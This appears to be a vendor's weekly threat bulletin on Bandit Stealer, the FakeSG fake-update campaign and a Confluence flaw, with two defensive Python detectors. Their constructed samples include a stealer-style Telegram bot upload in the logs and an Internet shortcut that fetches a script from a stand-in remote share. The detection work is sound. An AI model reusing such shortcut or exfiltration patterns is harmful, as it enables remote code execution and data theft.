| New Threat Detection Added | 3 (Bandit Stealer, FakeSG APT and Atlassian Confluence CVE-2023-22518) |
| New Threat Protections | 9 |
| New Ransomware Victims Last Week | 103 |
Weekly Detected Threats
The following threats were added to Crystal Eye XDR this week:
Threat name: Bandit Stealer
Bandit Stealer is an information stealer that harvests credentials and other sensitive data from web browsers, email clients and cryptocurrency wallets, and exfiltrates the collected data to its operators over Telegram. Once running on a host it applies several anti-analysis and sandbox-evasion checks to avoid detection (reflected in the T1497 entries of the rule set below). It has been advertised and sold on underground forums since April 2023 and is written in Go, a language increasingly favoured by malware authors.
Rule Set Type:
Execution T1047 - Defence Evasion T1027/T1036/T1497 - Credential Access T1003/T1056 - Discovery T1016/T1018/T1082/T1497 - Collection T1005/T1056 - Command-and-Control T1071/T1095/T1105
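Because Bandit Stealer hands its loot to a Telegram bot, one practical detection is to watch network telemetry for Telegram Bot API calls originating from processes that have no business talking to that API. The script below is an added example written for this report, not the Crystal Eye rule itself: it parses constructed proxy/EDR log lines (the format, the process names and the bot token are all invented for illustration), flags `api.telegram.org/bot<id>:<token>/<method>` requests from any process outside a small allowlist, and aggregates the bytes sent per process and bot so a large `sendDocument` upload stands out. The allowlist of legitimate Telegram clients is an assumption you would tune to your environment.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry (not real logs): "<timestamp> <process> <verb> <url> <bytes_sent>".
# The process name, bot id and token are made up for this example.
SAMPLE_LOGS = """\
2023-11-08T10:01:12Z chrome.exe GET https://www.example.com/ 412
2023-11-08T10:01:30Z svchost_upd.exe POST https://api.telegram.org/bot1234567890:AAHabcdefghijklmnopqrstuvwxyz0123456789/sendDocument 184320
2023-11-08T10:02:05Z Telegram.exe POST https://api.telegram.org/bot5555555555:AAHzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz/sendMessage 210
2023-11-08T10:02:40Z outlook.exe GET https://outlook.office365.com/owa/ 980
2023-11-08T10:03:11Z svchost_upd.exe POST https://api.telegram.org/bot1234567890:AAHabcdefghijklmnopqrstuvwxyz0123456789/sendMessage 96
2023-11-08T10:04:00Z chrome.exe GET https://web.telegram.org/a/ 3021
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(GET|POST|PUT)\s+(\S+)\s+(\d+)$")
# Telegram Bot API URLs carry the bot token in the path: /bot<numeric id>:<secret>/<method>
BOT_API_RE = re.compile(r"^https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{20,})/(\w+)")

# Assumption: processes that are allowed to talk to the Bot API in this environment.
KNOWN_TELEGRAM_CLIENTS = {"telegram.exe"}


@dataclass
class Alert:
    timestamp: str
    process: str
    bot_id: str
    token_prefix: str   # only the first characters are kept so alerts do not leak the full token
    api_method: str
    bytes_sent: int


def parse_line(line):
    """Return (timestamp, process, verb, url, bytes_sent) or None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, proc, verb, url, size = m.groups()
    return ts, proc, verb, url, int(size)


def detect_telegram_exfil(log_text, allowlist=KNOWN_TELEGRAM_CLIENTS):
    """Flag Bot API requests from any process not on the allowlist."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, proc, verb, url, size = rec
        m = BOT_API_RE.match(url)
        if not m or proc.lower() in allowlist:
            continue
        bot_id, token, api_method = m.groups()
        alerts.append(Alert(ts, proc, bot_id, token[:4] + "...", api_method, size))
    return alerts


def summarize(alerts):
    """Aggregate per (process, bot id): request count, total bytes sent and API methods used."""
    totals = defaultdict(lambda: {"requests": 0, "bytes_sent": 0, "methods": set()})
    for a in alerts:
        entry = totals[(a.process, a.bot_id)]
        entry["requests"] += 1
        entry["bytes_sent"] += a.bytes_sent
        entry["methods"].add(a.api_method)
    return dict(totals)


if __name__ == "__main__":
    found = detect_telegram_exfil(SAMPLE_LOGS)
    for a in found:
        print(f"{a.timestamp} {a.process} -> bot {a.bot_id} ({a.token_prefix}) {a.api_method} {a.bytes_sent} bytes")
    for (proc, bot), stats in summarize(found).items():
        print(f"{proc} / bot {bot}: {stats['requests']} requests, {stats['bytes_sent']} bytes, {sorted(stats['methods'])}")
```

In the constructed sample the two requests from the lookalike `svchost_upd.exe` are flagged while the real Telegram client and the browser visiting `web.telegram.org` are not; `sendDocument` with a six-digit byte count is the call worth paging someone for, since that is how a stealer ships a zipped loot archive.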
Threat name: FakeSG APT
A couple of years ago researchers reported the FakeUpdates (SocGholish) campaign, which lures visitors to compromised websites into running a fake browser update that installs the NetSupport RAT, giving the operators remote access to the victim's machine and a foothold from which to deliver further payloads. A newer campaign, FakeSG, uses the same lure on compromised WordPress sites and delivers NetSupport RAT through ZIP downloads or Internet shortcut (.url) files. Despite being a newcomer, FakeSG layers several stages of obfuscation on its payloads, making it a credible rival to SocGholish.
Rule Set Type:
Execution T1059 - Privilege Escalation T1548 - Defence Evasion T1564/T1218/T1027/T1112/T1548/T1140 - Discovery T1082 - Command-and-Control T1071/T1571
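The delivery artefacts named above (a ZIP archive, or an Internet shortcut) are what a responder usually has in hand first. The script below is an added triage example written for this report, not code from the campaign or from any product: it builds a constructed "browser update" ZIP in memory, lists any script, executable or shortcut inside it, and parses each `.url` file's `[InternetShortcut]` section to classify where the shortcut actually points. A `.url` whose target is a `file://host/...` URL or a `\\host\share` UNC path makes Windows fetch the file from a remote server when the shortcut is opened, which is the case worth flagging; the file names, the RFC 5737 test address and the extension list are assumptions for illustration.

```python
import configparser
import io
import zipfile
from urllib.parse import urlparse

# Assumption: file types that should never arrive inside a "browser update" archive.
SUSPICIOUS_EXTS = {".js", ".jse", ".vbs", ".wsf", ".hta", ".ps1", ".bat", ".cmd",
                   ".exe", ".msi", ".url", ".lnk"}

# Constructed sample artefact (not from the campaign): an Internet shortcut whose target is
# a remote file share, so opening it pulls Update.js from 198.51.100.23 (a documentation address).
FAKE_UPDATE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://198.51.100.23/share/Update.js\r\n"
    "IconIndex=3\r\n"
)


def shortcut_target(url_file_text):
    """Return the URL= value of an Internet shortcut (.url is an INI file), or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(url_file_text)
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def assess_shortcut(url_file_text):
    """Classify a .url file by the kind of target it opens."""
    target = shortcut_target(url_file_text)
    if target is None:
        return "no-target"
    if target.startswith("\\\\"):
        return "unc-path"               # \\host\share\file: fetched over SMB/WebDAV
    p = urlparse(target)
    if p.scheme == "file":
        return "remote-file-share" if p.netloc else "local-file"
    if p.scheme in ("http", "https"):
        return "web-url"
    return "other"


def triage_zip(zip_bytes):
    """Return (member name, finding) pairs for every suspicious member of a ZIP archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            if ext == ".url":
                verdict = assess_shortcut(zf.read(name).decode("utf-8", "replace"))
                findings.append((name, "internet-shortcut:" + verdict))
            elif ext in SUSPICIOUS_EXTS:
                findings.append((name, "script-or-executable"))
    return findings


def build_sample_zip():
    """Construct the sample archive in memory (file names are invented for the example)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Chrome_Update_v119.url", FAKE_UPDATE_URL_FILE)
        zf.writestr("Update.js", "// placeholder: an obfuscated loader would sit here\n")
        zf.writestr("README.txt", "Run the update to continue.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, finding in triage_zip(build_sample_zip()):
        print(f"{name}: {finding}")
```

A shortcut classified as `web-url` still deserves a look at the host it points to, but `remote-file-share` and `unc-path` are the verdicts that turn a harmless-looking shortcut into a download-and-execute primitive and should block the archive outright.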
Threat name: Atlassian Confluence CVE-2023-22518
An improper authorisation vulnerability in Atlassian Confluence Data Centre and Server allows an unauthenticated attacker to cause significant data loss. There is no impact on confidentiality, as the attacker cannot exfiltrate any instance data; the risk is to the integrity and availability of the Confluence instance.
Rule Set Type:
Initial Access T1190
Known exploited vulnerabilities (Week 2 - November 2023)
Service Location Protocol (SLP) Denial-of-Service Vulnerability
Atlassian Confluence Data Centre and Server Improper Authorization Vulnerability
Updated Malware Signatures (Week 2 - November 2023)
A stealer malware that collects sensitive information from victim machines, encrypts it and exfiltrates it to its Command-and-Control server.
Also known as Zbot and is primarily designed to steal banking credentials.
A malware dropper that is designed to download additional malware on an infected machine.
A Microsoft Word-based malware which is used as a dropper for second-stage malware.
A malware that is used to send spam emails, conduct click frauds and cryptomining.
This malicious software installs and runs cryptocurrency mining applications.
New Ransomware Victims Last Week: 103
Red Piranha proactively gathers information about organisations impacted by ransomware attacks through various channels, including the Dark Web. In the past week our team identified 103 new ransomware victims, or updates to previously listed victims, from 20 distinct industries across 30 countries worldwide. This highlights the global reach and indiscriminate nature of ransomware attacks, which affect organisations of all sizes and sectors.
LockBit 3.0 accounted for the largest number of victims or updates (27, roughly 26% of the week's total) spread across various countries. The Alphv and BlackBasta groups listed 10 victims each (roughly 10% apiece). Below are the victim counts (%) for these ransomware groups and a few others.
| Name of Ransomware Group | Percentage of new Victims last week |